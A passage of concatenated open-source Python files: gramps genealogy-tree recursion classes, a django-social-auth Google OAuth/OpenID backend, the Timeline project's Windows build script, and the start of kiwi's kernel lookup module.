    . . a prolific person or recursion

    Methods (recursive)
    recurse - The main recursive routine. needs:
    . person_handle
    . g_level - Generation level of this person
    . . if max_gen is 2 and g_level is 1, only this generation
    . . will be displayed.
    . s_level - spousal level - most always 0
    recurse_parents - The same as above except:
    . mom (the spouse) is still shown even if s_level == 0
    . . father will have a level of (g_level, 0), mother (g_level, 1)
    """

    def __init__(self, dbase, maxgen, maxspouse=0):
        """Initialize with the
        . database
        . maxgen: the max generations (down) of people to return
        . maxspouse: the level of spouses to recurse through
        . . 0 = no spouses, 1 = spouses of a direct descendant
        . . 2 = spouses of 1, 3 = spouses of 2, etc.  See example below.
        """
        _PersonSeen.__init__(self)
        _FamilySeen.__init__(self)
        _StopRecurse.__init__(self)
        # example: maxgen = 2, maxspouses = 2
        #  (1,0) father
        #  (1,1) Mother
        #  (1,2) Mothers other spouse
        #    (2,0) kid 1 of mom and other spouse
        #  (2,0) Kid 1 of father and mother
        #  (1,1) fathers other spouse
        #    (2,0) Kid 1 of father and fathers other spouse
        #    (2,1) Spouse of Kid 1 of father and fathers other spouse
        self.database = dbase
        assert maxgen > 0
        self.max_generations = maxgen
        assert maxspouse >= 0
        self.max_spouses = maxspouse
        # can we bold direct descendants?
        # bold_now will have only three values
        # 0 - no bolding
        # 1 - Only bold the first person
        # 2 - Bold all direct descendants
        self.__bold_now = 1
        self.__this_slevel = -1

    def is_direct_descendant(self):
        """Is this person a direct descendant?
        . Can we bold this person and
        . are they a direct child of the father/mother
        . . not a spouse
        """
        return self.__bold_now != 0 and self.__this_slevel == 0

    def has_children(self, person_handle):
        """
        Quickly check to see if this person has children,
        while still respecting the people_seen list.
        """
        if not person_handle or person_handle in self.people_seen:
            return False
        person = self.database.get_person_from_handle(person_handle)
        for family_handle in person.get_family_handle_list():
            if family_handle not in self.families_seen:
                family = self.database.get_family_from_handle(family_handle)
                if family.get_child_ref_list():
                    return True
        return False

    def recurse(self, person_handle, g_level, s_level):
        """Traverse the descendants recursively
        until either the end of a line is found,
        or until we reach the maximum number of generations
        or we reach the max number of spouses
        that we want to deal with."""
        if not person_handle:
            return
        if g_level > self.max_generations:
            return  # one generation too many
        if s_level > 0 and s_level == self.max_spouses:
            return
        #if person_handle in self.people_seen: return
        person = self.database.get_person_from_handle(person_handle)
        family_handles = person.get_family_handle_list()
        if s_level == 0:
            val = family_handles[0] if family_handles else None
            self.__this_slevel = s_level
            self._add_person((g_level, s_level), person_handle, val)
            if self.__bold_now == 1:
                self.__bold_now = 0
            if not self.can_recurse():
                self.continue_recursion()
                return
        if s_level == 1:
            tmp_bold = self.__bold_now
            self.__bold_now = 0
        for family_handle in family_handles:
            # Marriage box if the option is there.
            self._add_marriage((g_level, s_level + 1),
                               person_handle, family_handle)
            if not self.can_recurse():
                self.continue_recursion()
                return
            family = self.database.get_family_from_handle(family_handle)
            spouse_handle = utils.find_spouse(person, family)
            if self.max_spouses > s_level:
                self.__this_slevel = s_level + 1
                self._add_person((g_level, s_level + 1),
                                 spouse_handle, family_handle)
                # BUG FIX: the original read 'if not self.can_recurse:',
                # testing the bound method object (always truthy), so a
                # stop_recursion() request was silently ignored here.
                if not self.can_recurse():
                    self.continue_recursion()
                    return
            mykids = [kid.ref for kid in family.get_child_ref_list()]
            if self.can_recurse():
                for child_ref in mykids:
                    self.recurse(child_ref, g_level + 1, 0)
            else:
                self.continue_recursion()
            if self.max_spouses > s_level:
                #spouse_handle = utils.find_spouse(person,family)
                self.recurse(spouse_handle, g_level, s_level + 1)
        if s_level == 1:
            self.__bold_now = tmp_bold

    def recurse_parents(self, family_handle, g_level):
        """
        Adds a family.
        ignoring maxspouse, s_level assumed 0 and 1
        father is (g_level, 0) and mother is (g_level, 1)
        children are (g_level+1, 0) and respect maxgen
        """
        if family_handle is None:
            return
        family = self.database.get_family_from_handle(family_handle)
        father_h = family.get_father_handle()
        mother_h = family.get_mother_handle()
        self.__bold_now = 2
        self.__this_slevel = 0
        #if father_h:
        father_b = self._add_person((g_level, 0), father_h, family_handle)
        #else:
        #    #TODO - should send family_h instead of None?
        #    father_b = self._add_person((g_level, 0), None, family_h)
        #self.people_seen.add(father_h)
        family_b = self._add_marriage((g_level, 1), father_h, family_handle)
        self.__bold_now = 0
        self.__this_slevel = 1
        mother_b = self._add_person((g_level, 1), mother_h, family_handle)
        self.__bold_now = 2
        for child_ref in family.get_child_ref_list():
            self.recurse(child_ref.ref, g_level + 1, 0)
        self.__bold_now = 0
        return (father_b, family_b, mother_b)

    def recurse_if(self, person_handle, g_level):
        """
        Quickly check to see if we want to continue recursion;
        we still want to respect the families_seen list.
        """
        person = self.database.get_person_from_handle(person_handle)
        show = False
        myfams = person.get_family_handle_list()
        if len(myfams) > 1:  # and self.max_spouses > 0
            show = True
        #if self.max_spouses == 0 and not self.has_children(person_handle):
        #    self.people_seen.add(person_handle)
        #    show = False
        if show:
            self.__bold_now = 1
            self.recurse(person_handle, g_level, 0)
#------------------------------------------------------------------------
#
# Class AscendPerson
#
#------------------------------------------------------------------------
class AscendPerson(_StopRecurse, _PersonSeen):
    """ Recursive (up) base class
    The following methods need to be sub-classed as needed:
    . add_person
    . add_person_again (called when a person is seen a second or more times)
    if you don't want to see marriages don't subclass the following
    . add_marriage
    . . index (below) will be the same as the father
    returns:
    . add_person, add_person_again, add_marriage all return
    . . index -> a tuple in the form
    . . . generation, which generational level >= 1
    . . . . Center person is 1
    . . . . Father/Mother is the generational level of the child + 1
    . . . index
    . . . . The center person is 1
    . . . . A father is the index of the child * 2
    . . . . A mother is the (index of the child * 2) + 1
    . . person_handle (May be None)
    . . family_handle (May be None)
    Public variables:
    . people_seen, a set of all people seen.
    . . useful for knowing if a recursion (kid marrying a grandparent)
    . . has happened.
    These can be edited if needed
    . people_seen, a set of all people seen.
    . . appending can be useful for excluding parts of the tree
    """
    def __init__(self, dbase, maxgen, maxfill=0):
        _PersonSeen.__init__(self)
        _StopRecurse.__init__(self)
        """ initialized with the
        . database
        . maxgen is the max generations (up) of people to return
        . . maxgen >= 1.  1 will only be the person.
        . maxfill is the max generations of blank (null) people to return
        . . maxfill >= 0.  0 (default) is no empty generations
        """
        self.database = dbase
        assert maxgen > 0
        self.max_generations = maxgen
        assert maxfill >= 0
        self.fill_out = maxfill
    def add_marriage(self, index, indi_handle, fams_handle):
        """ Makes a marriage box and add that person into the Canvas. """
        # We are using add_marriage only and not an add_marriage_again
        # because the father will do any _again stuff if needed.
        pass
    def __fill(self, generation, index, mx_fill):
        """
        A skeleton of __iterate used when person_handle == family_handle ==
        None: emits empty (placeholder) ancestor boxes up to mx_fill levels.
        """
        if generation > self.max_generations or mx_fill == 0:
            # Gone too far.
            return
        self.add_person((generation, index), None, None)
        if not self.can_recurse():
            self.continue_recursion()
            return
        # Recursively call the function. It is okay if the handle is None,
        # since routine handles a handle of None
        self.__fill(generation+1, index*2, mx_fill-1)
        if mx_fill > 1:  # marriage of parents
            self.add_marriage((generation+1, index*2), None, None)
            if not self.can_recurse():
                self.continue_recursion()
                return
            self.__fill(generation+1, (index*2)+1, mx_fill-1)
    def __iterate(self, generation, index, person_handle, full_family_handle):
        """
        Recursive function to walk back all parents of the current person.
        When max_generations are hit, we stop the traversal.
        Code pilfered from gramps/plugins/textreports/ancestorreport.py
        """
        # check for end of the current recursion level. This happens
        # if the person handle is None, or if the max_generations is hit
        if generation > self.max_generations:  # too many generations
            return
        if person_handle is None:  # Ran out of people
            return self.__fill(generation, index, self.fill_out)
        # retrieve the Person instance from the database from the
        # passed person_handle and find the parents from the list.
        # Since this report is for natural parents (birth parents),
        # we have to handle that parents may not
        person = self.database.get_person_from_handle(person_handle)
        # we have a valid person, add him/her
        self._add_person((generation, index), person_handle, full_family_handle)
        # has the user canceled recursion?
        if not self.can_recurse():
            self.continue_recursion()
            return
        # Now recurse on the parents
        family_handle = person.get_main_parents_family_handle()
        if family_handle is not None:
            family = self.database.get_family_from_handle(family_handle)
            father_handle = family.get_father_handle()
            mother_handle = family.get_mother_handle()
        else:
            father_handle = None
            mother_handle = None
        # Recursively call the function. It is okay if the handle is None,
        self.__iterate(generation+1, index*2, father_handle, family_handle)  #recurse on dad
        if generation < self.max_generations:
            if father_handle is not None:  # Still within max_generations
                self.add_marriage((generation+1, index*2), father_handle, family_handle)
            elif mother_handle is not None:
                self.add_marriage((generation+1, index*2), mother_handle, family_handle)
            elif family_handle is not None:
                self.add_marriage((generation+1, index*2), None, family_handle)
            elif self.fill_out > 0:
                # No family at all; emit an empty marriage box for padding.
                self.add_marriage((generation+1, index*2), None, None)
            if not self.can_recurse():
                self.continue_recursion()
                return
            self.__iterate(generation+1, (index*2)+1, mother_handle, family_handle)  #recurse mom
    def recurse(self, person_handle):
        """
        A simple header to make sure we pass in the correct information
        """
        return self.__iterate(1, 1, person_handle, None)
#------------
# Jer 29:11: "For I know the plans I have for you," declares the LORD,
# "plans to prosper you and not to harm you, plans to give you hope
# and a future."
| beernarrd/gramps | gramps/plugins/lib/librecurse.py | Python | gpl-2.0 | 18,750 |
"""
Google OpenID and OAuth support
OAuth works straightforward using anonymous configurations, username
is generated by requesting email to the not documented, googleapis.com
service. Registered applications can define settings GOOGLE_CONSUMER_KEY
and GOOGLE_CONSUMER_SECRET and they will be used in the auth process.
Setting GOOGLE_OAUTH_EXTRA_SCOPE can be used to access different user
related data, like calendar, contacts, docs, etc.
OAuth2 works similar to OAuth but application must be defined on Google
APIs console https://code.google.com/apis/console/ Identity option.
OpenID also works straightforward, it doesn't need further configurations.
"""
from urllib import urlencode
from urllib2 import Request, urlopen
from oauth2 import Request as OAuthRequest
from django.utils import simplejson
from social_auth.utils import setting
from social_auth.backends import OpenIdAuth, ConsumerBasedOAuth, BaseOAuth2, \
OAuthBackend, OpenIDBackend, USERNAME
from social_auth.backends.exceptions import AuthFailed
# Google OAuth base configuration
GOOGLE_OAUTH_SERVER = 'www.google.com'
AUTHORIZATION_URL = 'https://www.google.com/accounts/OAuthAuthorizeToken'
REQUEST_TOKEN_URL = 'https://www.google.com/accounts/OAuthGetRequestToken'
ACCESS_TOKEN_URL = 'https://www.google.com/accounts/OAuthGetAccessToken'
# Google OAuth2 base configuration
GOOGLE_OAUTH2_SERVER = 'accounts.google.com'
# NOTE(review): constant name below has a typo ("OATUH"); kept as-is since
# other modules may already import it by this name.
GOOGLE_OATUH2_AUTHORIZATION_URL = 'https://accounts.google.com/o/oauth2/auth'
# scope for user email, specify extra scopes in settings, for example:
# GOOGLE_OAUTH_EXTRA_SCOPE = ['https://www.google.com/m8/feeds/']
GOOGLE_OAUTH_SCOPE = ['https://www.googleapis.com/auth/userinfo#email']
GOOGLE_OAUTH2_SCOPE = ['https://www.googleapis.com/auth/userinfo.email',
                       'https://www.googleapis.com/auth/userinfo.profile']
# Endpoints used to fetch user data once a token has been obtained.
GOOGLEAPIS_EMAIL = 'https://www.googleapis.com/userinfo/email'
GOOGLEAPIS_PROFILE = 'https://www.googleapis.com/oauth2/v1/userinfo'
GOOGLE_OPENID_URL = 'https://www.google.com/accounts/o8/id'
# Backends
class GoogleOAuthBackend(OAuthBackend):
    """Google OAuth authentication backend"""
    name = 'google-oauth'

    def get_user_id(self, details, response):
        """Use google email as unique id"""
        user_email = details['email']
        validate_whitelists(self, user_email)
        return user_email

    def get_user_details(self, response):
        """Return user details from the Google account response."""
        email = response['email']
        user_details = {
            'email': email,
            'fullname': '',
            'first_name': '',
            'last_name': '',
        }
        user_details[USERNAME] = email.split('@', 1)[0]
        return user_details
class GoogleOAuth2Backend(GoogleOAuthBackend):
    """Google OAuth2 authentication backend"""
    name = 'google-oauth2'
    EXTRA_DATA = [
        ('refresh_token', 'refresh_token', True),
        ('expires_in', setting('SOCIAL_AUTH_EXPIRATION', 'expires'))
    ]

    def get_user_id(self, details, response):
        """Use google email or id as unique id"""
        # Run the parent lookup first: it also validates the whitelists.
        default_id = super(GoogleOAuth2Backend, self).get_user_id(details,
                                                                  response)
        if setting('GOOGLE_OAUTH2_USE_UNIQUE_USER_ID', False):
            return response['id']
        return default_id

    def get_user_details(self, response):
        """Return user details from the Google API profile response."""
        email = response['email']
        user_details = {
            'email': email,
            'fullname': response.get('name', ''),
            'first_name': response.get('given_name', ''),
            'last_name': response.get('family_name', ''),
        }
        user_details[USERNAME] = email.split('@', 1)[0]
        return user_details
class GoogleBackend(OpenIDBackend):
    """Google OpenID authentication backend"""
    name = 'google'

    def get_user_id(self, details, response):
        """Return the unique id provided by the service.

        For Google the user email is unique enough to identify a single
        user.  The email comes from schema: http://axschema.org/contact/email
        """
        user_email = details['email']
        validate_whitelists(self, user_email)
        return user_email
# Auth classes
class GoogleAuth(OpenIdAuth):
    """Google OpenID authentication"""
    # Backend class used to create/locate the user from the OpenID response.
    AUTH_BACKEND = GoogleBackend
    def openid_url(self):
        """Return Google OpenID service url"""
        return GOOGLE_OPENID_URL
class BaseGoogleOAuth(ConsumerBasedOAuth):
    """Base class for Google OAuth mechanism"""
    # OAuth 1.0a endpoints shared by all Google OAuth backends.
    AUTHORIZATION_URL = AUTHORIZATION_URL
    REQUEST_TOKEN_URL = REQUEST_TOKEN_URL
    ACCESS_TOKEN_URL = ACCESS_TOKEN_URL
    SERVER_URL = GOOGLE_OAUTH_SERVER
    def user_data(self, access_token, *args, **kwargs):
        """Loads user data from G service"""
        # Subclasses must fetch and return the user data dictionary.
        raise NotImplementedError('Implement in subclass')
class GoogleOAuth(BaseGoogleOAuth):
    """Google OAuth authorization mechanism"""
    AUTH_BACKEND = GoogleOAuthBackend
    # Django settings holding the registered consumer credentials.
    SETTINGS_KEY_NAME = 'GOOGLE_CONSUMER_KEY'
    SETTINGS_SECRET_NAME = 'GOOGLE_CONSUMER_SECRET'
    def user_data(self, access_token, *args, **kwargs):
        """Return user data from Google API"""
        request = self.oauth_request(access_token, GOOGLEAPIS_EMAIL,
                                     {'alt': 'json'})
        # The signed query string must also be sent in the Authorization
        # header, so split the signed URL back into base URL and params.
        url, params = request.to_url().split('?', 1)
        return googleapis_email(url, params)
    def oauth_authorization_request(self, token):
        """Generate OAuth request to authorize token."""
        return OAuthRequest.from_consumer_and_token(self.consumer,
                                                    token=token,
                                                    http_url=self.AUTHORIZATION_URL)
    def oauth_request(self, token, url, extra_params=None):
        # Always request the email scope plus any extra scopes configured.
        extra_params = extra_params or {}
        scope = GOOGLE_OAUTH_SCOPE + setting('GOOGLE_OAUTH_EXTRA_SCOPE', [])
        extra_params.update({
            'scope': ' '.join(scope),
        })
        if not self.registered():
            # Anonymous (unregistered) apps must send a display name.
            xoauth_displayname = setting('GOOGLE_DISPLAY_NAME', 'Social Auth')
            extra_params['xoauth_displayname'] = xoauth_displayname
        return super(GoogleOAuth, self).oauth_request(token, url, extra_params)
    @classmethod
    def get_key_and_secret(cls):
        """Return Google OAuth Consumer Key and Consumer Secret pair, uses
        anonymous by default, beware that this marks the application as not
        registered and a security badge is displayed on authorization page.
        http://code.google.com/apis/accounts/docs/OAuth_ref.html#SigningOAuth
        """
        try:
            return super(GoogleOAuth, cls).get_key_and_secret()
        except AttributeError:
            # Settings are missing; fall back to anonymous access.
            return 'anonymous', 'anonymous'
    @classmethod
    def enabled(cls):
        """Google OAuth is always enabled because of anonymous access"""
        return True
    def registered(self):
        """Check if Google OAuth Consumer Key and Consumer Secret are set"""
        return self.get_key_and_secret() != ('anonymous', 'anonymous')
# TODO: Remove this setting name check, keep for backward compatibility
# Prefer the documented GOOGLE_OAUTH2_CLIENT_ID setting; fall back to the
# legacy GOOGLE_OAUTH2_CLIENT_KEY name when the new one is not defined.
# (Conditional expression replaces the error-prone 'x and a or b' idiom.)
_OAUTH2_KEY_NAME = ('GOOGLE_OAUTH2_CLIENT_ID'
                    if setting('GOOGLE_OAUTH2_CLIENT_ID')
                    else 'GOOGLE_OAUTH2_CLIENT_KEY')
class GoogleOAuth2(BaseOAuth2):
    """Google OAuth2 support"""
    AUTH_BACKEND = GoogleOAuth2Backend
    # OAuth2 endpoints; registration at https://code.google.com/apis/console/
    AUTHORIZATION_URL = 'https://accounts.google.com/o/oauth2/auth'
    ACCESS_TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'
    SETTINGS_KEY_NAME = _OAUTH2_KEY_NAME
    SETTINGS_SECRET_NAME = 'GOOGLE_OAUTH2_CLIENT_SECRET'
    SCOPE_VAR_NAME = 'GOOGLE_OAUTH_EXTRA_SCOPE'
    DEFAULT_SCOPE = GOOGLE_OAUTH2_SCOPE
    REDIRECT_STATE = False
    def user_data(self, access_token, *args, **kwargs):
        """Return user data from Google API"""
        return googleapis_profile(GOOGLEAPIS_PROFILE, access_token)
def googleapis_email(url, params):
    """Loads user data from googleapis service, only email so far as it's
    described in http://sites.google.com/site/oauthgoog/Home/emaildisplayscope
    Parameters must be passed in queryset and Authorization header as described
    on Google OAuth documentation at:
    http://groups.google.com/group/oauth/browse_thread/thread/d15add9beb418ebc
    and: http://code.google.com/apis/accounts/docs/OAuth2.html#CallingAnAPI
    """
    full_url = '%s?%s' % (url, params)
    request = Request(full_url, headers={'Authorization': params})
    try:
        response = urlopen(request)
        payload = simplejson.loads(response.read())
        return payload['data']
    except (ValueError, KeyError, IOError):
        # Bad JSON, missing 'data' key or network failure: no user data.
        return None
def googleapis_profile(url, access_token):
    """
    Loads user data from googleapis service, such as name, given_name,
    family_name, etc. as it's described in:
    https://developers.google.com/accounts/docs/OAuth2Login
    """
    query = urlencode({'access_token': access_token, 'alt': 'json'})
    request = Request('%s?%s' % (url, query))
    try:
        response = urlopen(request)
        return simplejson.loads(response.read())
    except (ValueError, KeyError, IOError):
        # Bad JSON or network failure: no profile data available.
        return None
def validate_whitelists(backend, email):
    """
    Validate the given email against the whitelist settings:
        GOOGLE_WHITE_LISTED_DOMAINS
        GOOGLE_WHITE_LISTED_EMAILS
    An empty (or missing) setting allows every domain/email.

    Raises AuthFailed when the email's domain is not whitelisted.
    """
    allowed_emails = setting('GOOGLE_WHITE_LISTED_EMAILS', [])
    allowed_domains = setting('GOOGLE_WHITE_LISTED_DOMAINS', [])
    if allowed_emails and email in allowed_emails:
        # Explicitly whitelisted address: accept regardless of domain.
        return
    if allowed_domains and email.split('@', 1)[1] not in allowed_domains:
        raise AuthFailed(backend, 'Domain not allowed')
# Backend definition
# Maps the backend name (as used in auth URLs and settings) to its class.
BACKENDS = {
    'google': GoogleAuth,
    'google-oauth': GoogleOAuth,
    'google-oauth2': GoogleOAuth2,
}
| marco-lancini/Showcase | social_auth/backends/google.py | Python | mit | 9,593 |
# Copyright (C) 2009, 2010, 2011 Rickard Lindberg, Roger Lindberg
#
# This file is part of Timeline.
#
# Timeline is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Timeline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Timeline. If not, see <http://www.gnu.org/licenses/>.
"""
Working directory = BUILD_DIR
COPYDIR Copies from TIMELINE_DIR to BUILD_DIR
"""
import sys
import os
import shutil
import subprocess
# Source tree root (two levels up from this script) and the build output dir.
TIMELINE_DIR = os.path.abspath("..\\..\\")
BUILD_DIR = os.path.abspath(".\\target")

# Op-codes for the entries in the per-target action tables below.
COPYFILE = 0
COPYDIR = 1
MAKEDIR = 2
PUSHD = 3
POPD = 4
RUNCMD = 5
RUNPYSCRIPT = 6
CPYDIR = 7
ANNOTATE = 8
RUNPYTEST = 9

# Human readable names, used when logging actions as they execute.
# Fix: the ANNOTATE entry was missing, so any lookup for it would raise
# KeyError; now every op-code has a name.
ACTION_NAMES = {COPYFILE: "COPYFILE",
                COPYDIR: "COPYDIR",
                MAKEDIR: "MAKEDIR",
                PUSHD: "PUSHD",
                POPD: "POPD",
                RUNCMD: "RUNCMD",
                RUNPYSCRIPT: "RUNPYSCRIPT",
                RUNPYTEST: "RUNPYTEST",
                CPYDIR: "CPYDIR",
                ANNOTATE: "ANNOTATE", }
known_targets = ("win32", "win32py25", "source")
# Build recipe for the win32 target.  Each entry is an (opcode, src, dst)
# triple executed in order by Target.execute_actions(); src paths are
# relative to TIMELINE_DIR and dst paths relative to BUILD_DIR.
win32_actions = ((ANNOTATE, "Modify some python files", ""),
                 (COPYDIR, r"release\win\cmd", "cmd"),
                 (COPYFILE, r"source\timeline.py", "timeline.py"),
                 (RUNPYSCRIPT, r"cmd\mod2_timeline_py.py", ""),
                 (COPYDIR, r"source\timelinelib", "timelinelib"),
                 (RUNPYSCRIPT, r"cmd\mod2_paths_py.py", ""),
                 (RUNPYSCRIPT, r"cmd\mod2_version_py.py", ""),
                 (RUNPYSCRIPT, r"cmd\mod2_factory_py.py", ""),
                 (MAKEDIR, None, "inno"),
                 (COPYFILE, r"release\win\inno\timelineWin32_2.iss", r"inno\timelineWin32_2.iss"),
                 (RUNPYSCRIPT, r"cmd\mod2_timeline_iss_win32.py", ""),
                 (ANNOTATE, "Run Tests", ""),
                 (PUSHD, "..\\..\\..\\", ""),
                 # (RUNPYTEST, r"test\execute-specs.py", ""),
                 # (RUNPYTEST, r"test\execute-specs-repeat.py", ""),
                 (POPD, "", ""),
                 (ANNOTATE, "Library dependencies", ""),
                 (COPYDIR, r"dependencies\timelinelib\icalendar-3.2\icalendar", "icalendar"),
                 (COPYDIR, r"dependencies\timelinelib\pytz-2012j\pytz", "pytz"),
                 (COPYDIR, r"dependencies\timelinelib\pysvg-0.2.1\pysvg", "pysvg"),
                 (COPYDIR, r"dependencies\timelinelib\markdown-2.0.3\markdown", "markdown"),
                 (ANNOTATE, "Create distribution directory", ""),
                 (COPYFILE, r"release\win\inno\setup.py", "setup.py"),
                 (MAKEDIR, None, "icons"),
                 (COPYFILE, r"release\win\inno\Timeline.ico", r"icons\Timeline.ico"),
                 (RUNPYSCRIPT, "setup.py", "py2exe"),
                 (ANNOTATE, "Create distribution executable", ""),
                 (COPYFILE, "SConstruct", "SConstruct"),
                 (COPYDIR, "po", "po"),
                 (RUNCMD, "scons.bat", ""),
                 (CPYDIR, "po", r"dist\po"),
                 (COPYDIR, "icons", r"dist\icons"),
                 (COPYFILE, r"release\win\inno\Timeline.ico", r"dist\icons\Timeline.ico"),
                 (COPYFILE, "COPYING", "COPYING"),
                 (COPYFILE, r"release\win\inno\WINSTALL", r"WINSTALL"),
                 (ANNOTATE, "Create Setup executable", ""),
                 (RUNCMD, "iscc.exe", r"inno\timelineWin32_2.iss"),
                 (ANNOTATE, "Done", ""),
                 )
# Build recipe for the Python 2.5 flavour of the win32 target.  Same steps
# as win32_actions but with the py25-specific Inno Setup script and with no
# ANNOTATE/test steps (section headers are plain comments instead).
win32py25_actions = ( # Modify some python files
                     (COPYDIR, r"release\win\cmd", "cmd"),
                     (COPYFILE, r"source\timeline.py", "timeline.py"),
                     (RUNPYSCRIPT, r"cmd\mod2_timeline_py.py", ""),
                     (COPYDIR, r"source\timelinelib", "timelinelib"),
                     (RUNPYSCRIPT, r"cmd\mod2_paths_py.py", ""),
                     (RUNPYSCRIPT, r"cmd\mod2_version_py.py", ""),
                     (RUNPYSCRIPT, r"cmd\mod2_factory_py.py", ""),
                     (MAKEDIR, None, "inno"),
                     (COPYFILE, r"release\win\inno\timelineWin32_py25.iss", r"inno\timelineWin32_2.iss"),
                     (RUNPYSCRIPT, r"cmd\mod2_timeline_iss_win32.py", ""),
                     # Library dependencies
                     (COPYDIR, r"dependencies\timelinelib\icalendar-3.2\icalendar", "icalendar"),
                     (COPYDIR, r"dependencies\timelinelib\pytz-2012j\pytz", "pytz"),
                     (COPYDIR, r"dependencies\timelinelib\pysvg-0.2.1\pysvg", "pysvg"),
                     (COPYDIR, r"dependencies\timelinelib\markdown-2.0.3\markdown", "markdown"),
                     # Create distribution directory
                     (COPYFILE, r"release\win\inno\setup.py", "setup.py"),
                     (MAKEDIR, None, "icons"),
                     (COPYFILE, r"release\win\inno\Timeline.ico", r"icons\Timeline.ico"),
                     (RUNPYSCRIPT, "setup.py", "py2exe"),
                     # Create distribution executable
                     (COPYFILE, "SConstruct", "SConstruct"),
                     (COPYDIR, "po", "po"),
                     (RUNCMD, "scons.bat", ""),
                     (CPYDIR, "po", r"dist\po"),
                     (COPYDIR, "icons", r"dist\icons"),
                     (COPYFILE, r"release\win\inno\Timeline.ico", r"dist\icons\Timeline.ico"),
                     (COPYFILE, "COPYING", "COPYING"),
                     (COPYFILE, r"release\win\inno\WINSTALL", r"WINSTALL"),
                     # Create setup executable
                     (RUNCMD, "iscc.exe", r"inno\timelineWin32_2.iss"),
                     )
# Build recipe for the source tarball target: run the existing source
# release script from the project root.
source_actions = ( # Change working dir to TIMELINE_DIR
                  (PUSHD, TIMELINE_DIR, None),
                  # Create source release artifact
                  (RUNPYTEST, "release\make-source-release.py", ""),
                  # Restore working dir
                  (POPD, None, None),
                  )
# Lookup table: target name -> its action table.
actions = {"win32": win32_actions,
           "win32py25": win32py25_actions,
           "source": source_actions}
class Target():
def __init__(self, target):
print "-------------------------------------------------------"
print " %s" % ("Building target %s" % target)
print "-------------------------------------------------------"
self.target = target
self.actions = actions[target]
self.ACTION_METHODS = {COPYFILE: self.copyfile,
COPYDIR: self.copydir,
MAKEDIR: self.makedir,
PUSHD: self.pushd,
POPD: self.popd,
RUNCMD: self.runcmd,
RUNPYSCRIPT: self.runpyscript,
RUNPYTEST: self.runpytest,
CPYDIR: self.cpydir,
ANNOTATE: self.annotate}
def build(self):
self.define_root_dirs()
self.create_target_dir()
self.execute_actions()
def define_root_dirs(self):
self.timeline_dir = TIMELINE_DIR
self.build_dir = os.path.abspath(".\\target")
print "Source in %s" % self.timeline_dir
print "Target in %s" % os.getcwd()
def create_target_dir(self):
print "Deleting old target"
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
print "Creating target dir"
os.mkdir(self.build_dir)
os.chdir(self.build_dir)
self.cwd = os.getcwd()
def execute_actions(self):
count = 0
total = len([actions for action in self.actions if action[0] is not ANNOTATE])
try:
for action, src, dst in self.actions:
if action is not ANNOTATE:
count += 1
print "Action %2d(%2d): %s" % (count, total, ACTION_NAMES[action])
self.ACTION_METHODS[action](src, dst)
print "BUILD DONE"
except Exception, ex:
print str(ex)
print "BUILD FAILED"
def annotate(self, src, dst):
self.print_header(src)
def copyfile(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
shutil.copyfile(os.path.join(self.timeline_dir, src), dst)
def copydir(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
shutil.copytree(os.path.join(self.timeline_dir, src), os.path.join(dst))
def cpydir(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
shutil.copytree(os.path.join(src), os.path.join(dst))
def makedir(self, src, dst):
self.print_src_dst(None, dst)
print " dst: %s" % os.path.abspath(dst)
os.mkdir(os.path.join(self.build_dir, dst))
def runpyscript(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
success, msg = self.run_pyscript(src, [dst])
if not success:
raise Exception(msg)
def runpytest(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
success, msg = self.run_pyscript(src, [dst], display_stderr=True)
if not success:
raise Exception(msg)
def runcmd(self, src, dst):
self.print_src_dst(src, dst)
success, msg = self.run_command([src, dst])
if not success:
raise Exception(msg)
def pushd(self, src, dst):
self.print_src_dst(os.getcwd(), os.path.abspath(src))
self.cwd = os.getcwd()
os.chdir(src)
def popd(self, src, dst):
self.print_src_dst(None, self.cwd)
print " dst: %s" % self.cwd
os.chdir(self.cwd)
def run_pyscript(self, script, args=[], display_stderr=False):
return self.run_command(["python", script] + args, display_stderr)
def run_command(self, cmd, display_stderr=False):
if display_stderr:
rc = subprocess.call(cmd)
return rc == 0, ""
else:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.communicate()
if p.returncode == 0:
return True, out[0]
else:
return False, out[1]
def print_header(self, message):
print "-------------------------------------------------------"
print " %s" % message
print "-------------------------------------------------------"
def print_src_dst(self, src, dst):
if src is not None:
print " src: %s" % src
if dst is not None:
print " dst: %s" % dst
def main():
    """Entry point: build the target named by the first CLI argument."""
    if len(sys.argv) == 1:
        print "A target-name must be given as an argument"
    else:
        target = sys.argv[1]
        if target not in known_targets:
            print "%s is an unknown target" % target
        else:
            Target(target).build()
if __name__ == "__main__":
    main()
| linostar/timeline-clone | release/buildtool/build.py | Python | gpl-3.0 | 11,324 |
# Copyright (c) 2015 SUSE Linux GmbH. All rights reserved.
#
# This file is part of kiwi.
#
# kiwi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# kiwi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with kiwi. If not, see <http://www.gnu.org/licenses/>
#
import os
import re
from collections import namedtuple
# project
from kiwi.command import Command
from kiwi.exceptions import KiwiKernelLookupError
class Kernel:
    """
    **Implements kernel lookup and extraction from a given root tree**

    :param str root_dir: root directory path name

    .. note::
        The list of kernel image names to search for is derived at
        construction time from the directories below
        ``<root_dir>/lib/modules``; it is not a constructor parameter.
        functions.sh::suseStripKernel() provides a normalized
        file so that we do not have to search for many different
        names in this code
    """
    def __init__(self, root_dir):
        # Root of the (possibly chroot) tree kernel files are looked up in.
        self.root_dir = root_dir
        # Candidate kernel image file names below <root_dir>/boot.
        self.kernel_names = self._setup_kernel_names_for_lookup()
    def get_kernel(self, raise_on_not_found=False):
        """
